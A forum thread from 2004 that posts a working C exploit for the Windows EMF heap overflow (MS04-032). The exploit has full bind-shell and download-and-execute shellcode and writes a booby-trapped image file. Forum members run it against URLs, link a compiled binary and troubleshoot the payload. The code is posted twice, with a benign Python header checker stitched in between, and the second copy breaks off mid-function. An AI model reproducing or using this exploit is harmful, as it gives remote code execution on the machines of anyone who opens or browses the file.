Topic: Microsoft Windows Metafile (.emf) Heap Overflow Exploit (MS04-032) (Read 896 times)
juanchoc

Microsoft Windows Metafile (.emf) Heap Overflow Exploit (MS04-032)
« on: 22 October 2004, 08:01 »

/* HOD-ms04032-emf-expl2.c:
 *
 * (MS04-032) Microsoft Windows XP Metafile (.emf) Heap Overflow
 *
 * Exploit version 0.2 (PUBLIC) coded by
 *
 *
 *                 .::[ houseofdabus ]::.
 *
 *
 * [at inbox dot ru]
 * -------------------------------------------------------------------
 * About WMF/EMF:
 * Windows Metafile (WMF) and Enhanced Windows Metafile (EMF) formats
 * are vector files that can contain a raster image...
 *
 * -------------------------------------------------------------------
 * The vulnerability will be triggered by either viewing a malicious
 * file or by navigating to a directory, which contains a malicious
 * file and displays it as a thumbnail.
 *
 * Graphics Rendering Engine Vulnerability - CAN-2004-0209
 * -------------------------------------------------------------------
 * Tested on:
 *    - Internet Explorer 6.0 (SP1) (iexplore.exe)
 *    - Explorer (explorer.exe)
 *    - Windows XP SP1
 *
 * -------------------------------------------------------------------
 * Compile:
 *    Win32/VC++  : cl HOD-ms04032-emf-expl.c
 *    Win32/cygwin: gcc HOD-ms04032-emf-expl.c -lws2_32.lib
 *    Linux       : gcc -o HOD-ms04032-emf-expl HOD-ms04032-emf-expl.c
 *
 * -------------------------------------------------------------------
 * Command Line Parameters/Arguments:
 *
 *   HOD.exe <file> <shellcode> <bind/connectback port> [connectback IP]
 *
 *   Shellcode:
 *        1 - Portbind shellcode
 *        2 - Connectback shellcode
 *
 * -------------------------------------------------------------------
 * Examples:
 *
 * C:\>HOD-ms04032-emf-expl.exe expl.emf 1 7777
 *
 * C:\>HOD-ms04032-emf-expl.exe expl.emf 2 http://host/file.exe
 *
 * -------------------------------------------------------------------
 *
 *   This is provided as proof-of-concept code only for educational
 *   purposes and testing by authorized individuals with permission to
 *   do so.
 *
 */
 
 
/* #define _WIN32 */
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
#ifdef _WIN32
#pragma comment(lib,"ws2_32")
#include <winsock2.h>
#include <windows.h>     /* Win32 only; keeps the Linux build described above compiling */
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>   /* htons() */
#endif
 
 
unsigned char emfheader[] = 
"\x01\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x20\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x4c\x03\x00\x00\x4c\x03\x00\x00\x20\x45\x4d\x46\x00\x00\x01\x00"
"\x40\x00\x00\x00\x0b\x00\x00\x00\x0a\x00\x00\x00\xff\xff\x00\x00"
 
"\xEB\x12\x90\x90\x90\x90\x90\x90"
"\x9e\x5c\x05\x78"   /* call [edi+0x74h] - rpcrt4.dll */
"\xb4\x73\xed\x77";   /* Top SEH          - XP SP1 */
 
 
unsigned char portbind_sc[] =
"\x90\x90\x90\x90\x90\x90\x90\x90"
 
"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff"
"\xff\xff\x8b\xc5\x83\xc0\x11\x33\xc9\x66\xb9\xc9\x01\x80\x30\x88"
"\x40\xe2\xfa\xdd\x03\x64\x03\x7c\x09\x64\x08\x88\x88\x88\x60\xc4"
"\x89\x88\x88\x01\xce\x74\x77\xfe\x74\xe0\x06\xc6\x86\x64\x60\xd9"
"\x89\x88\x88\x01\xce\x4e\xe0\xbb\xba\x88\x88\xe0\xff\xfb\xba\xd7"
"\xdc\x77\xde\x4e\x01\xce\x70\x77\xfe\x74\xe0\x25\x51\x8d\x46\x60"
"\xb8\x89\x88\x88\x01\xce\x5a\x77\xfe\x74\xe0\xfa\x76\x3b\x9e\x60"
"\xa8\x89\x88\x88\x01\xce\x46\x77\xfe\x74\xe0\x67\x46\x68\xe8\x60"
"\x98\x89\x88\x88\x01\xce\x42\x77\xfe\x70\xe0\x43\x65\x74\xb3\x60"
"\x88\x89\x88\x88\x01\xce\x7c\x77\xfe\x70\xe0\x51\x81\x7d\x25\x60"
"\x78\x88\x88\x88\x01\xce\x78\x77\xfe\x70\xe0\x2c\x92\xf8\x4f\x60"
"\x68\x88\x88\x88\x01\xce\x64\x77\xfe\x70\xe0\x2c\x25\xa6\x61\x60"
"\x58\x88\x88\x88\x01\xce\x60\x77\xfe\x70\xe0\x6d\xc1\x0e\xc1\x60"
"\x48\x88\x88\x88\x01\xce\x6a\x77\xfe\x70\xe0\x6f\xf1\x4e\xf1\x60"
"\x38\x88\x88\x88\x01\xce\x5e\xbb\x77\x09\x64\x7c\x89\x88\x88\xdc"
"\xe0\x89\x89\x88\x88\x77\xde\x7c\xd8\xd8\xd8\xd8\xc8\xd8\xc8\xd8"
"\x77\xde\x78\x03\x50\xdf\xdf\xe0\x8a\x88\xAB\x6F\x03\x44\xe2\x9e"
"\xd9\xdb\x77\xde\x64\xdf\xdb\x77\xde\x60\xbb\x77\xdf\xd9\xdb\x77"
"\xde\x6a\x03\x58\x01\xce\x36\xe0\xeb\xe5\xec\x88\x01\xee\x4a\x0b"
"\x4c\x24\x05\xb4\xac\xbb\x48\xbb\x41\x08\x49\x9d\x23\x6a\x75\x4e"
"\xcc\xac\x98\xcc\x76\xcc\xac\xb5\x01\xdc\xac\xc0\x01\xdc\xac\xc4"
"\x01\xdc\xac\xd8\x05\xcc\xac\x98\xdc\xd8\xd9\xd9\xd9\xc9\xd9\xc1"
"\xd9\xd9\x77\xfe\x4a\xd9\x77\xde\x46\x03\x44\xe2\x77\x77\xb9\x77"
"\xde\x5a\x03\x40\x77\xfe\x36\x77\xde\x5e\x63\x16\x77\xde\x9c\xde"
"\xec\x29\xb8\x88\x88\x88\x03\xc8\x84\x03\xf8\x94\x25\x03\xc8\x80"
"\xd6\x4a\x8c\x88\xdb\xdd\xde\xdf\x03\xe4\xac\x90\x03\xcd\xb4\x03"
"\xdc\x8d\xf0\x8b\x5d\x03\xc2\x90\x03\xd2\xa8\x8b\x55\x6b\xba\xc1"
"\x03\xbc\x03\x8b\x7d\xbb\x77\x74\xbb\x48\x24\xb2\x4c\xfc\x8f\x49"
"\x47\x85\x8b\x70\x63\x7a\xb3\xf4\xac\x9c\xfd\x69\x03\xd2\xac\x8b"
"\x55\xee\x03\x84\xc3\x03\xd2\x94\x8b\x55\x03\x8c\x03\x8b\x4d\x63"
"\x8a\xbb\x48\x03\x5d\xd7\xd6\xd5\xd3\x4a\x8c\x88";
 
 
unsigned char download_sc[]=
"\x90\x90\x90\x90\x90\x90\x90\x90"
 
"\xEB\x0F\x58\x80\x30\x17\x40\x81\x38\x6D\x30\x30\x21\x75\xF4"
"\xEB\x05\xE8\xEC\xFF\xFF\xFF\xFE\x94\x16\x17\x17\x4A\x42\x26"
"\xCC\x73\x9C\x14\x57\x84\x9C\x54\xE8\x57\x62\xEE\x9C\x44\x14"
"\x71\x26\xC5\x71\xAF\x17\x07\x71\x96\x2D\x5A\x4D\x63\x10\x3E"
"\xD5\xFE\xE5\xE8\xE8\xE8\x9E\xC4\x9C\x6D\x2B\x16\xC0\x14\x48"
"\x6F\x9C\x5C\x0F\x9C\x64\x37\x9C\x6C\x33\x16\xC1\x16\xC0\xEB"
"\xBA\x16\xC7\x81\x90\xEA\x46\x26\xDE\x97\xD6\x18\xE4\xB1\x65"
"\x1D\x81\x4E\x90\xEA\x63\x05\x50\x50\xF5\xF1\xA9\x18\x17\x17"
"\x17\x3E\xD9\x3E\xE0\xFE\xFF\xE8\xE8\xE8\x26\xD7\x71\x9C\x10"
"\xD6\xF7\x15\x9C\x64\x0B\x16\xC1\x16\xD1\xBA\x16\xC7\x9E\xD1"
"\x9E\xC0\x4A\x9A\x92\xB7\x17\x17\x17\x57\x97\x2F\x16\x62\xED"
"\xD1\x17\x17\x9A\x92\x0B\x17\x17\x17\x47\x40\xE8\xC1\x7F\x13"
"\x17\x17\x17\x7F\x17\x07\x17\x17\x7F\x68\x81\x8F\x17\x7F\x17"
"\x17\x17\x17\xE8\xC7\x9E\x92\x9A\x17\x17\x17\x9A\x92\x18\x17"
"\x17\x17\x47\x40\xE8\xC1\x40\x9A\x9A\x42\x17\x17\x17\x46\xE8"
"\xC7\x9E\xD0\x9A\x92\x4A\x17\x17\x17\x47\x40\xE8\xC1\x26\xDE"
"\x46\x46\x46\x46\x46\xE8\xC7\x9E\xD4\x9A\x92\x7C\x17\x17\x17"
"\x47\x40\xE8\xC1\x26\xDE\x46\x46\x46\x46\x9A\x82\xB6\x17\x17"
"\x17\x45\x44\xE8\xC7\x9E\xD4\x9A\x92\x6B\x17\x17\x17\x47\x40"
"\xE8\xC1\x9A\x9A\x86\x17\x17\x17\x46\x7F\x68\x81\x8F\x17\xE8"
"\xA2\x9A\x17\x17\x17\x44\xE8\xC7\x48\x9A\x92\x3E\x17\x17\x17"
"\x47\x40\xE8\xC1\x7F\x17\x17\x17\x17\x9A\x8A\x82\x17\x17\x17"
"\x44\xE8\xC7\x9E\xD4\x9A\x92\x26\x17\x17\x17\x47\x40\xE8\xC1"
"\xE8\xA2\x86\x17\x17\x17\xE8\xA2\x9A\x17\x17\x17\x44\xE8\xC7"
"\x9A\x92\x2E\x17\x17\x17\x47\x40\xE8\xC1\x44\xE8\xC7\x9A\x92"
"\x56\x17\x17\x17\x47\x40\xE8\xC1\x7F\x12\x17\x17\x17\x9A\x9A"
"\x82\x17\x17\x17\x46\xE8\xC7\x9A\x92\x5E\x17\x17\x17\x47\x40"
"\xE8\xC1\x7F\x17\x17\x17\x17\xE8\xC7\xFF\x6F\xE9\xE8\xE8\x50"
"\x72\x63\x47\x65\x78\x74\x56\x73\x73\x65\x72\x64\x64\x17\x5B"
"\x78\x76\x73\x5B\x7E\x75\x65\x76\x65\x6E\x56\x17\x41\x7E\x65"
"\x63\x62\x76\x7B\x56\x7B\x7B\x78\x74\x17\x48\x7B\x74\x65\x72"
"\x76\x63\x17\x48\x7B\x60\x65\x7E\x63\x72\x17\x48\x7B\x74\x7B"
"\x78\x64\x72\x17\x40\x7E\x79\x52\x6F\x72\x74\x17\x52\x6F\x7E"
"\x63\x47\x65\x78\x74\x72\x64\x64\x17\x40\x7E\x79\x5E\x79\x72"
"\x63\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x56"
"\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x42\x65"
"\x7B\x56\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x45\x72\x76\x73"
"\x51\x7E\x7B\x72\x17\x17\x17\x17\x17\x17\x17\x17\x17\x7A\x27"
"\x27\x39\x72\x6F\x72\x17""HOD""\x21";
 
unsigned char endoffile[] = "\x00\x00\x00\x00";
 
 
void
usage(char *prog)
{
   printf("Usage:\n");
   printf("%s <file> <shellcode> <bindport / url>\n", prog);
   printf("\nShellcode:\n");
   printf("      1 - Portbind shellcode\n");
   printf("      2 - Download & exec shellcode\n\n");
   exit(0);
}
 
 
int
main(int argc, char **argv)
{
   char endofurl = '\x01';
   unsigned short port;
   int sc;
   FILE *fp;
 
   printf("\n(MS04-032) Microsoft Windows XP Metafile (.emf) Heap Overflow\n\n");
   printf("--- Coded by .::[ houseofdabus ]::. ---\n\n");
 
   if (argc < 4) usage(argv[0]);
 
   sc = atoi(argv[2]);
   if ((sc > 2) || (sc < 1)) usage(argv[0]);
 
   fp = fopen(argv[1], "wb");
   if (fp == NULL) {
      printf("[-] error: can\'t create file: %s\n", argv[1]);
      exit(0);
   }
 
   /* header */
   fwrite(emfheader, 1, sizeof(emfheader)-1, fp);
 
   printf("[*] Shellcode: ");
   if (sc == 1) {
      port = atoi(argv[3]);
      printf("Portbind, port = %u\n", port);
      port = htons(port^(unsigned short)0x8888);
      memcpy(portbind_sc+266, &port, 2);
      fwrite(portbind_sc, 1, sizeof(portbind_sc)-1, fp);
      fwrite(endoffile, 1, 4, fp);
   }
   else {
      printf("Download & exec, url = %s\n", argv[3]);
      fwrite(download_sc, 1, sizeof(download_sc)-1, fp);
      fwrite(argv[3], 1, strlen(argv[3]), fp);
      fwrite(&endofurl, 1, 1, fp);
      fwrite(endoffile, 1, 4, fp);
   }
 
   printf("[+] Ok\n");
   fclose(fp);
 
   return 0;
}
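Added here as a defender-side check, not part of the thread or of houseofdabus's code: a Python consistency checker for the 88-byte ENHMETAHEADER layout (MS-EMF EMR_HEADER), run over the 64 header bytes from the exploit above with constructed 0x90 filler in place of the payload, and over a constructed minimal well-formed file. It flags the crafted header's 64-byte record size, the declared-versus-actual size mismatch and the out-of-range description, without asserting which field the overflow actually depends on.

```python
import struct

# ENHMETAHEADER / EMR_HEADER layout (MS-EMF 2.3.4.2): 88 bytes, little-endian.
_HDR_FMT = "<IIiiiiiiiiIIIIHHIIIiiii"
_HDR_LEN = struct.calcsize(_HDR_FMT)  # 88
_FIELDS = ("type", "size", "b_left", "b_top", "b_right", "b_bottom",
           "f_left", "f_top", "f_right", "f_bottom", "signature", "version",
           "bytes", "records", "handles", "reserved", "n_description",
           "off_description", "n_pal_entries", "dev_cx", "dev_cy", "mm_cx", "mm_cy")
EMR_HEADER = 1
EMF_SIGNATURE = 0x464D4520  # the bytes " EMF" read as a little-endian DWORD


def parse_emf_header(data):
    """Decode the fixed 88-byte header; None if the file is shorter than that."""
    if len(data) < _HDR_LEN:
        return None
    return dict(zip(_FIELDS, struct.unpack_from(_HDR_FMT, data, 0)))


def check_emf_header(data):
    """Return a list of findings; an empty list means the header is self-consistent."""
    hdr = parse_emf_header(data)
    if hdr is None:
        return ["file shorter than the 88-byte ENHMETAHEADER"]
    findings = []
    if hdr["type"] != EMR_HEADER:
        findings.append("first record is not EMR_HEADER")
    if hdr["signature"] != EMF_SIGNATURE:
        findings.append("missing ' EMF' signature")
    if hdr["size"] < _HDR_LEN:
        findings.append("header record size %d is below the 88-byte minimum" % hdr["size"])
    if hdr["bytes"] != len(data):
        findings.append("declared file size %d != actual %d" % (hdr["bytes"], len(data)))
    # The optional description is UTF-16 (2 bytes per char) and must lie inside
    # the header record, after its fixed part, and inside the file.
    if hdr["n_description"]:
        end = hdr["off_description"] + 2 * hdr["n_description"]
        if hdr["off_description"] < _HDR_LEN or end > hdr["size"] or end > len(data):
            findings.append("description (%d chars at offset %d) lies outside the header record"
                            % (hdr["n_description"], hdr["off_description"]))
    return findings


# The 64 header bytes from the exploit above, then constructed 0x90 filler in
# place of the payload region (sample input, not the real shellcode).
CRAFTED = (b"\x01\x00\x00\x00\x40\x00\x00\x00" + b"\x00" * 8
           + b"\x20\x00\x00\x00\x20\x00\x00\x00" + b"\x00" * 8
           + b"\x4c\x03\x00\x00\x4c\x03\x00\x00\x20\x45\x4d\x46\x00\x00\x01\x00"
           + b"\x40\x00\x00\x00\x0b\x00\x00\x00\x0a\x00\x00\x00\xff\xff\x00\x00"
           + b"\x90" * 40)


def benign_emf():
    """Constructed minimal well-formed file: full header followed by a 20-byte EMR_EOF (type 14)."""
    eof = struct.pack("<IIIII", 14, 20, 0, 16, 20)
    hdr = struct.pack(_HDR_FMT, EMR_HEADER, _HDR_LEN, 0, 0, 32, 32, 0, 0, 844, 844,
                      EMF_SIGNATURE, 0x10000, _HDR_LEN + len(eof), 2, 1, 0,
                      0, 0, 0, 1024, 768, 320, 240)
    return hdr + eof


if __name__ == "__main__":
    for name, blob in (("crafted", CRAFTED), ("benign", benign_emf())):
        print(name + ":", check_emf_header(blob) or "header consistent")
```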
Man-In-the-Middle
Re: Microsoft Windows Metafile (.emf) Heap Overflow Exploit (MS04-032)
« Reply #1 on: 22 October 2004, 11:21 »

Good exploit Juanchoc!!, it works very well!!!


C:\>cd 1

C:\1>meta.exe

(MS04-032) Microsoft Windows XP Metafile (.emf) Heap Overflow

--- Coded by .::[ houseofdabus ]::. ---

Usage:

„¡ <file> <shellcode> <bindport / url>

Shellcode:
      1 - Portbind shellcode
      2 - Download & exec shellcode


C:\1>meta prueba.emf 2 http://xxxxxxxx.xxxxxxxxxxxx

(MS04-032) Microsoft Windows XP Metafile (.emf) Heap Overflow

--- Coded by .::[ houseofdabus ]::. ---

 Shellcode: Download & exec, url = http://xxxxxxxx.xxxxxxxxxxxx
 Ok

C:\1>

All good: you open the file prueba.emf from anywhere, be it IExplorer or explorer, and it crashes, buttttttttt.... something happens the moment you click it: you see the download window but it closes quickly. I thought the exe that did the download would put it in C:, or I don't know, in the same folder or in temp, but it doesn't download. Let's see if someone lends a hand, because this exploit does run, and well, it just needs a little push!

an example (a master at grabbing screenshots in thousandths of a second haha ;D)


Gospel, show yourself hahaha, for real doc, let's see if this code gets a really good look and the tests get posted
Compiled exploit:
http://mx.geocities.com/petzulu2004/meta.zip

Smooth sailing, juanchoc!!!


Regards

Man-In-the-Middle



« Last edit: 22 October 2004, 12:12 by Man-In-the-Middle »
fandango
Re: Microsoft Windows Metafile (.emf) Heap Overflow Exploit (MS04-032)
« Reply #2 on: 22 October 2004, 18:37 »

Hi, a question: I ran the exploit like this, c:\meta filename 2 url; does any name go in the filename? If so, I ran it and this shows up:

C:\>meta.exe archivo.emf 2 www.********.com

(MS04-032) Microsoft Windows XP Metafile (.emf) Heap Overflow

--- Coded by .::[ houseofdabus ]::. ---

 Shellcode: Download & exec, url = www.********.com
 Ok

C:\>

Then I go to drive C: and the created file "archivo.emf" is there; I double-click it but nothing happens. What do you have to do??

Cheers.

Sir_Neo

Re: Microsoft Windows Metafile (.emf) Heap Overflow Exploit (MS04-032)
« Reply #3 on: 22 October 2004, 22:24 »

Come on, I don't understand any of it. Can you explain a bit more what this exploit does?? At least post where you got it from, so I can go there and read up a bit.

man, I'm waiting for a brief explanation.
Man-In-the-Middle
Re: Microsoft Windows Metafile (.emf) Heap Overflow Exploit (MS04-032)
« Reply #4 on: 23 October 2004, 04:19 »

Look, the exploit crashes up to a certain point, it's that simple: when you run it, it pops a download screen at you but only for a millisecond, so it doesn't let you see that it's downloading. Something is definitely wrong, but that's what we're all here for, to study this exploit.

Regards.

Man-In-the-Middle

juanchoc

Re: Microsoft Windows Metafile (.emf) Heap Overflow Exploit (MS04-032)
« Reply #5 on: 23 October 2004, 11:06 »

Sorry, I already found what was wrong.
Here you have it:

Code:

/* HOD-ms04032-emf-expl2.c:
 *
 * (MS04-032) Microsoft Windows XP Metafile (.emf) Heap Overflow
 *
 * Exploit version 0.2 (PUBLIC) coded by
 *
 *
 *                 .::[ houseofdabus ]::.
 *
 *
 * [at inbox dot ru]
 * -------------------------------------------------------------------
 * About WMF/EMF:
 * Windows Metafile (WMF) and Enhanced Windows Metafile (EMF) formats
 * are vector files that can contain a raster image...
 *
 * -------------------------------------------------------------------
 * The vulnerability will be triggered by either viewing a malicious
 * file or by navigating to a directory, which contains a malicious
 * file and displays it as a thumbnail.
 *
 * Graphics Rendering Engine Vulnerability - CAN-2004-0209
 * -------------------------------------------------------------------
 * Tested on:
 *    - Internet Explorer 6.0 (SP1) (iexplore.exe)
 *    - Explorer (explorer.exe)
 *    - Windows XP SP1
 *
 * -------------------------------------------------------------------
 * Compile:
 *    Win32/VC++  : cl HOD-ms04032-emf-expl.c
 *    Win32/cygwin: gcc HOD-ms04032-emf-expl.c -lws2_32.lib
 *    Linux       : gcc -o HOD-ms04032-emf-expl HOD-ms04032-emf-expl.c
 *
 * -------------------------------------------------------------------
 * Command Line Parameters/Arguments:
 *
 *   HOD.exe <file> <shellcode> <bind/connectback port> [connectback IP]
 *
 *   Shellcode:
 *        1 - Portbind shellcode
 *        2 - Connectback shellcode
 *
 * -------------------------------------------------------------------
 * Examples:
 *
 * C:\>HOD-ms04032-emf-expl.exe expl.emf 1 7777
 *
 * C:\>HOD-ms04032-emf-expl.exe expl.emf 2 http://host/file.exe
 *
 * -------------------------------------------------------------------
 *
 *   This is provided as proof-of-concept code only for educational
 *   purposes and testing by authorized individuals with permission to
 *   do so.
 *
 */
 
 
/* #define _WIN32 */
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
#ifdef _WIN32
#pragma comment(lib,"ws2_32")
#include <winsock2.h>
#include <windows.h>     /* Win32 only; keeps the Linux build described above compiling */
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>   /* htons() */
#endif
 
 
unsigned char emfheader[] = 
"\x01\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x20\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x4c\x03\x00\x00\x4c\x03\x00\x00\x20\x45\x4d\x46\x00\x00\x01\x00"
"\x40\x00\x00\x00\x0b\x00\x00\x00\x0a\x00\x00\x00\xff\xff\x00\x00"
 
"\xEB\x12\x90\x90\x90\x90\x90\x90"
"\x9e\x5c\x05\x78" /* call [edi+0x74h] - rpcrt4.dll */
"\xb4\x73\xed\x77"; /* Top SEH          - XP SP1 */
 
 
unsigned char portbind_sc[] =
"\x90\x90\x90\x90\x90\x90\x90\x90"
 
"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff"
"\xff\xff\x8b\xc5\x83\xc0\x11\x33\xc9\x66\xb9\xc9\x01\x80\x30\x88"
"\x40\xe2\xfa\xdd\x03\x64\x03\x7c\x09\x64\x08\x88\x88\x88\x60\xc4"
"\x89\x88\x88\x01\xce\x74\x77\xfe\x74\xe0\x06\xc6\x86\x64\x60\xd9"
"\x89\x88\x88\x01\xce\x4e\xe0\xbb\xba\x88\x88\xe0\xff\xfb\xba\xd7"
"\xdc\x77\xde\x4e\x01\xce\x70\x77\xfe\x74\xe0\x25\x51\x8d\x46\x60"
"\xb8\x89\x88\x88\x01\xce\x5a\x77\xfe\x74\xe0\xfa\x76\x3b\x9e\x60"
"\xa8\x89\x88\x88\x01\xce\x46\x77\xfe\x74\xe0\x67\x46\x68\xe8\x60"
"\x98\x89\x88\x88\x01\xce\x42\x77\xfe\x70\xe0\x43\x65\x74\xb3\x60"
"\x88\x89\x88\x88\x01\xce\x7c\x77\xfe\x70\xe0\x51\x81\x7d\x25\x60"
"\x78\x88\x88\x88\x01\xce\x78\x77\xfe\x70\xe0\x2c\x92\xf8\x4f\x60"
"\x68\x88\x88\x88\x01\xce\x64\x77\xfe\x70\xe0\x2c\x25\xa6\x61\x60"
"\x58\x88\x88\x88\x01\xce\x60\x77\xfe\x70\xe0\x6d\xc1\x0e\xc1\x60"
"\x48\x88\x88\x88\x01\xce\x6a\x77\xfe\x70\xe0\x6f\xf1\x4e\xf1\x60"
"\x38\x88\x88\x88\x01\xce\x5e\xbb\x77\x09\x64\x7c\x89\x88\x88\xdc"
"\xe0\x89\x89\x88\x88\x77\xde\x7c\xd8\xd8\xd8\xd8\xc8\xd8\xc8\xd8"
"\x77\xde\x78\x03\x50\xdf\xdf\xe0\x8a\x88\xAB\x6F\x03\x44\xe2\x9e"
"\xd9\xdb\x77\xde\x64\xdf\xdb\x77\xde\x60\xbb\x77\xdf\xd9\xdb\x77"
"\xde\x6a\x03\x58\x01\xce\x36\xe0\xeb\xe5\xec\x88\x01\xee\x4a\x0b"
"\x4c\x24\x05\xb4\xac\xbb\x48\xbb\x41\x08\x49\x9d\x23\x6a\x75\x4e"
"\xcc\xac\x98\xcc\x76\xcc\xac\xb5\x01\xdc\xac\xc0\x01\xdc\xac\xc4"
"\x01\xdc\xac\xd8\x05\xcc\xac\x98\xdc\xd8\xd9\xd9\xd9\xc9\xd9\xc1"
"\xd9\xd9\x77\xfe\x4a\xd9\x77\xde\x46\x03\x44\xe2\x77\x77\xb9\x77"
"\xde\x5a\x03\x40\x77\xfe\x36\x77\xde\x5e\x63\x16\x77\xde\x9c\xde"
"\xec\x29\xb8\x88\x88\x88\x03\xc8\x84\x03\xf8\x94\x25\x03\xc8\x80"
"\xd6\x4a\x8c\x88\xdb\xdd\xde\xdf\x03\xe4\xac\x90\x03\xcd\xb4\x03"
"\xdc\x8d\xf0\x8b\x5d\x03\xc2\x90\x03\xd2\xa8\x8b\x55\x6b\xba\xc1"
"\x03\xbc\x03\x8b\x7d\xbb\x77\x74\xbb\x48\x24\xb2\x4c\xfc\x8f\x49"
"\x47\x85\x8b\x70\x63\x7a\xb3\xf4\xac\x9c\xfd\x69\x03\xd2\xac\x8b"
"\x55\xee\x03\x84\xc3\x03\xd2\x94\x8b\x55\x03\x8c\x03\x8b\x4d\x63"
"\x8a\xbb\x48\x03\x5d\xd7\xd6\xd5\xd3\x4a\x8c\x88";
 
 
unsigned char download_sc[]=
"\x90\x90\x90\x90\x90\x90\x90\x90"
 
"\xEB\x0F\x58\x80\x30\x17\x40\x81\x38\x6D\x30\x30\x21\x75\xF4"
"\xEB\x05\xE8\xEC\xFF\xFF\xFF\xFE\x94\x16\x17\x17\x4A\x42\x26"
"\xCC\x73\x9C\x14\x57\x84\x9C\x54\xE8\x57\x62\xEE\x9C\x44\x14"
"\x71\x26\xC5\x71\xAF\x17\x07\x71\x96\x2D\x5A\x4D\x63\x10\x3E"
"\xD5\xFE\xE5\xE8\xE8\xE8\x9E\xC4\x9C\x6D\x2B\x16\xC0\x14\x48"
"\x6F\x9C\x5C\x0F\x9C\x64\x37\x9C\x6C\x33\x16\xC1\x16\xC0\xEB"
"\xBA\x16\xC7\x81\x90\xEA\x46\x26\xDE\x97\xD6\x18\xE4\xB1\x65"
"\x1D\x81\x4E\x90\xEA\x63\x05\x50\x50\xF5\xF1\xA9\x18\x17\x17"
"\x17\x3E\xD9\x3E\xE0\xFE\xFF\xE8\xE8\xE8\x26\xD7\x71\x9C\x10"
"\xD6\xF7\x15\x9C\x64\x0B\x16\xC1\x16\xD1\xBA\x16\xC7\x9E\xD1"
"\x9E\xC0\x4A\x9A\x92\xB7\x17\x17\x17\x57\x97\x2F\x16\x62\xED"
"\xD1\x17\x17\x9A\x92\x0B\x17\x17\x17\x47\x40\xE8\xC1\x7F\x13"
"\x17\x17\x17\x7F\x17\x07\x17\x17\x7F\x68\x81\x8F\x17\x7F\x17"
"\x17\x17\x17\xE8\xC7\x9E\x92\x9A\x17\x17\x17\x9A\x92\x18\x17"
"\x17\x17\x47\x40\xE8\xC1\x40\x9A\x9A\x42\x17\x17\x17\x46\xE8"
"\xC7\x9E\xD0\x9A\x92\x4A\x17\x17\x17\x47\x40\xE8\xC1\x26\xDE"
"\x46\x46\x46\x46\x46\xE8\xC7\x9E\xD4\x9A\x92\x7C\x17\x17\x17"
"\x47\x40\xE8\xC1\x26\xDE\x46\x46\x46\x46\x9A\x82\xB6\x17\x17"
"\x17\x45\x44\xE8\xC7\x9E\xD4\x9A\x92\x6B\x17\x17\x17\x47\x40"
"\xE8\xC1\x9A\x9A\x86\x17\x17\x17\x46\x7F\x68\x81\x8F\x17\xE8"
"\xA2\x9A\x17\x17\x17\x44\xE8\xC7\x48\x9A\x92\x3E\x17\x17\x17"
"\x47\x40\xE8\xC1\x7F\x17\x17\x17\x17\x9A\x8A\x82\x17\x17\x17"
"\x44\xE8\xC7\x9E\xD4\x9A\x92\x26\x17\x17\x17\x47\x40\xE8\xC1"
"\xE8\xA2\x86\x17\x17\x17\xE8\xA2\x9A\x17\x17\x17\x44\xE8\xC7"
"\x9A\x92\x2E\x17\x17\x17\x47\x40\xE8\xC1\x44\xE8\xC7\x9A\x92"
"\x56\x17\x17\x17\x47\x40\xE8\xC1\x7F\x12\x17\x17\x17\x9A\x9A"
"\x82\x17\x17\x17\x46\xE8\xC7\x9A\x92\x5E\x17\x17\x17\x47\x40"
"\xE8\xC1\x7F\x17\x17\x17\x17\xE8\xC7\xFF\x6F\xE9\xE8\xE8\x50"
"\x72\x63\x47\x65\x78\x74\x56\x73\x73\x65\x72\x64\x64\x17\x5B"
"\x78\x76\x73\x5B\x7E\x75\x65\x76\x65\x6E\x56\x17\x41\x7E\x65"
"\x63\x62\x76\x7B\x56\x7B\x7B\x78\x74\x17\x48\x7B\x74\x65\x72"
"\x76\x63\x17\x48\x7B\x60\x65\x7E\x63\x72\x17\x48\x7B\x74\x7B"
"\x78\x64\x72\x17\x40\x7E\x79\x52\x6F\x72\x74\x17\x52\x6F\x7E"
"\x63\x47\x65\x78\x74\x72\x64\x64\x17\x40\x7E\x79\x5E\x79\x72"
"\x63\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x56"
"\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x42\x65"
"\x7B\x56\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x45\x72\x76\x73"
"\x51\x7E\x7B\x72\x17\x17\x17\x17\x17\x17\x17\x17\x17\x7A\x27"
"\x27\x39\x72\x6F\x72\x17""HOD""\x21";
 
unsigned char endoffile[] = "\x00\x00\x00\x00";
 
 
void
usage(char *prog)
{
   printf("Usage:\n");
   printf("%s <file> <shellcode> <bindport / url>\n", prog);
   printf("\nShellcode:\n");
   printf("      1 - Portbind shellcode\n");
   printf("      2 - Download & exec shellcode\n\n");
   exit(0);
}
 
 
int
main(int argc, char **argv)
{
   char endofurl = '\x01';
   unsigned short port;
   int sc;
   FILE *fp;
 
   printf("\n(MS04-032) Microsoft Windows XP Metafile (.emf) Heap Overflow\n\n");
   printf("--- Coded by .::[ houseofdabus ]::. ---\n\n");
 
   if (argc < 4) usage(argv[0]);
 
   sc = atoi(argv[2]);
   if ((sc > 2) || (sc < 1)) usage(argv[0]);
 
   fp = fopen(argv[1], "wb");
   if (fp == NULL) {
      printf("[-] error: can\'t create file: %s\n", argv[1]);
      exit(0);
   }
 
   /* header */
   fwrite(emfheader, 1, sizeof(emfheader)-1, fp);
 
   printf("[*] Shellcode: ");
   if (sc == 1) {
      port = atoi(argv[3]);
      printf("Portbind, port = %u\n", port);
      port = htons(port^(unsigned short)0x8888);
